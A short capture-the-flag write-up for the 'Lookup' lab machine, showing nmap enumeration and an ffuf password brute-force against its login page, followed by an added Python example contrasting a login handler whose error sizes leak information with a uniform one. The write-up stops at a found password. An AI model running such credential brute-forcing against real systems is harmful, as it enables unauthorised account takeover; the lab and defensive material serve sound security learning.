Lorenzo Bruno

Lookup

Test your enumeration skills on this boot-to-root machine.

To solve this challenge we need to obtain two flags:

  • User flag

  • Root flag

Enumeration

Let's start with the enumeration phase.

$ nmap -sV -sC <IP>

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 21:d4:44:b1:43:e3:a2:ca:51:b6:2f:dd:5a:ff:45:98 (RSA)
|   256 51:57:da:91:fd:9c:38:ec:24:b2:21:d7:f5:e0:cf:69 (ECDSA)
|_  256 68:dc:d7:0b:94:e6:c4:d1:62:ca:8b:a1:c2:d1:e9:6d (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let's check port 80 in our browser.

ffuf -u http://lookup.thm/login.php -X POST -d "username=admin&password=FUZZ" -w /home/kali/Documents/Hacking_stuff/SecLists/Passwords/xato-net-10-million-passwords-1000000.txt -H "Content-Type: application/x-www-form-urlencoded" -fs 62 
________________________________________________

password123    [Status: 200, Size: 74, Words: 10, Lines: 1, Duration: 66ms]

The response differs in size, but if we try the combination admin:password123 the login again returns an error.

This could suggest that we may have found the right password, but for the wrong username.
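The size difference that ffuf reports above means the login endpoint returns different bodies for different kinds of failed attempt. The following is an added example, not code from the room or from this writeup: a login handler whose failure body depends on which check failed, next to one that answers every failure identically, plus a check that measures the failure sizes. The account store, messages and function names are constructed assumptions.

```python
import hashlib
import hmac

# Constructed sample data (assumption, not taken from the room).
SALT = b"constructed-salt"


def _hash(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 10_000)


USERS = {"alice": _hash("correct horse")}
DUMMY = _hash("dummy")  # compared against when the username is unknown


def leaky_login(username: str, password: str) -> str:
    """Failure body depends on which check failed, so its size is an oracle."""
    if username not in USERS:
        return "Wrong username or password. Please try again."
    if not hmac.compare_digest(USERS[username], _hash(password)):
        return "Wrong password. Please try again."
    return "Welcome"


def uniform_login(username: str, password: str) -> str:
    """One body for every failure; the hash is computed for unknown users too."""
    stored = USERS.get(username, DUMMY)
    matches = hmac.compare_digest(stored, _hash(password))
    return "Welcome" if matches and username in USERS else "Invalid credentials."


def failure_sizes(login) -> set[int]:
    """Body sizes over failed attempts; more than one size means a leak."""
    attempts = [
        ("alice", "bad"),              # known user, wrong password
        ("nobody", "bad"),             # unknown user
        ("nobody", "correct horse"),   # valid password, wrong user
    ]
    return {len(login(user, pw)) for user, pw in attempts}


if __name__ == "__main__":
    print("leaky failure sizes:  ", sorted(failure_sizes(leaky_login)))
    print("uniform failure sizes:", sorted(failure_sizes(uniform_login)))
```

A size-based filter such as `-fs` has nothing to separate once every failed login yields the same body; rate limiting and lockout still have to be handled separately.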


Last updated 3 months ago
